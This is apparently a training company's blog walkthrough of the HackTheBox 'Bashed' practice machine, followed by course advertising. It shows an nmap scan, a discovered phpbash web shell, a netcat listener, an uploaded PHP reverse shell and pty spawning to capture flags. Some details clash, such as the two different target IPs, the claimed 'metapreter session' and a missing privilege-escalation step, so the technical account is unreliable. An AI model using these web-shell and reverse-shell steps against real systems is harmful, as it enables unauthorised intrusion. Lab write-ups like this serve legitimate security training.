HackTheBox – Walkthrough of BASHED BOX

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. Bashed is an easy to hack box and comfortable for beginners. However, easy it may be, it gives a solid foundation for a beginner to progress. It is unstable and you can find the hint to crack the box in the name itself.

We will use the following tools to pawn the box on a Kali Linux box

Step 1 – Scanning the network

As an initial step, before the machine is exploited, one needs to scan and investigate.

This is important to determine what can be exploited afterwards. It is always better to spend time on this phase to extract maximum information.

Nmap (Network Mapper). Nmap is a free and open-source utility for network discovery and security auditing. Raw IP packets are used to determine hosts available on the network, services offered by those hosts, operating systems running, packet filters, firewalls in use, and many other characteristics.

Use the following command to get a basic idea of what we are scanning

nmap -sV -sC -A 10.10.10.68

-sV: Probe open ports to determine service/version info

-sC: Default script sets

-A: Aggressive scan. Enable OS detection, version detection, script scanning, and traceroute

10.10.10.68: IP address of the BASHED box

We can see that there is only one open port:

Port 80. TCP/HTTP

Step 2 – Exploring the IP address

In the address bar of the browser, we visit the IP address of the Bashed box 10.10.10.75. We get to see a page that appears as a blog. It says that it is being developed on the server, so we might find a shell.

To move further, we enumerate the directories. We obtain a list of directories, and the most enticing one is the dev directory.

At 10.10.10.68/dev this dev directory leads to another page. On this page we find a payload phpbash.php.

Hooray! Through this payload we get a metapreter session!

Step 3 – Reverse PHP shell

The following is the terminal:

www-data@bashed:/var/www/html/dev#

A listener is set at

root@kali:~# nc -nlvp 1234

Next, a reverse python shell is echoed and uploaded using the given commands in the video.

/var/www/html/uploads# mv php-reverse-shell.txt php-reverse-shell.php

We imported a python file to spawn the system.

import pty;pty.spawn('/bin/bash')

Step 4 – Looking for the user.txt flag

Following command is used to list all the files/folders:-

ls

Let’s move to the home folder and see what we can be find

cd home
ls –la
cd arrexal

The following command is used to read the user.txt file.

cat user.txt

Step 5 – Looking for the root.txt flag

Now look for flag root.txt.

We find that with the username “scriptmanager” we can run any command. In the scripts folder, we find a python script owned by scriptmanager and a text file owned by root. As scriptmanager, I overwrite the script.

cat root/root.txt

Congrats! You found both flags!

About Cybervie

Cybervie provides best cyber security training program in hyderabad, India.This cyber security course enables you to detect vulnerablities of a system, wardoff attacks and manage emergency situations. Taking a proactive approach to security that can help organisations to protect their data, Cybervie has designed its training module based on the cyber security industry requirements with three levels of training in both offensive and defensive manner, and use real time scenarios which can help our students to understand the market up-to its standard certification which is an add on advantage for our students to stand out of competition in an cyber security interview.

More Info – Click Here

Share on facebook
Share on twitter
Share on linkedin
Share on whatsapp

Recent Posts

Follow Us on Youtube

Cyber Security Training Program 2020

Cyber security Course offered by Cybervie prepares students for a path of success in a highly demanding and rapidly growing field of cyber security. The course is completely designed with an adaptable mindset, where the program allows the student to complete the course work at their own pace while being able to complete weekly assignments. Hence, also making it convenient for busy working professionals to pursue the training to help them advance their career in cyber security.

Cybervie has designed the training module based on the cyber security industry requirements in both offensive and defensive manner, using real time scenarios which help our students to understand the market standards.

Sign up for our Newsletter

Interested in Cyber Security Training Program 2020 – Click Here